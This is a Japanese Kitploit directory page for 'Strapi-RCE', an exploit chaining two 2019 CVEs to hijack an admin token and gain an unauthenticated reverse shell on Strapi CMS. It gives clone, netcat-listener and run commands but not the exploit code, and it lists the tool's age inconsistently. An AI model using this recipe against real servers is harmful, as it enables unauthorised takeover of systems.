Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Strapi-RCE — Strapi CMSにおける認証されていないリモートコード実行のための、CVE-2019-18818とCVE-2019-19609を組み合わせたエクスプロイトスクリプト。 | Kitploit
ツール/GitHubGitHub/hackhoven/strapi-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubhackhoven/strapi-rce

Strapi-RCE

Strapi CMSにおける認証されていないリモートコード実行のための、CVE-2019-18818とCVE-2019-19609を組み合わせたエクスプロイトスクリプト。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Strapi-RCE

CVE-2019-18818 と CVE-2019-19609 を組み合わせたエクスプロイトスクリプトです。Strapi CMS において認証なしでリモートコード実行を実現します。

エクスプロイト

このスクリプトは、Strapi CMS バージョン 3.0.0-beta.17.4 以前の脆弱性を悪用し、認証なしでのリモートコード実行を可能にします。

説明

このエクスプロイトは、まずパスワードリセットの脆弱性を利用して管理ユーザーの JSON Web Token (JWT) を取得します。次に、そのトークンを使って Strapi CMS に悪意のあるペイロードを送信し、攻撃者のマシンへのリバースシェルを起動します。

使用方法

  1. リポジトリをクローンする:

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. ディレクトリに移動する

    root@kitploit:~
    cd Strapi-RCE/
    
  3. Netcat リスナーをセットアップする

    root@kitploit:~
    nc -nlvp <LPORT>
    
  4. ターゲット URL、ローカルホストの IP アドレス、ローカルホストのポートを引数としてスクリプトを実行する

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    

免責事項

このスクリプトは教育目的のみを意図しています。作者は、本スクリプトの違法または非倫理的な活動への使用を容認または支持しません。このスクリプトは、合法的なセキュリティ調査または CTF 環境でのみ使用されるべきです。自己責任で使用してください。


作成者: Hackhoven

ツールをダウンロード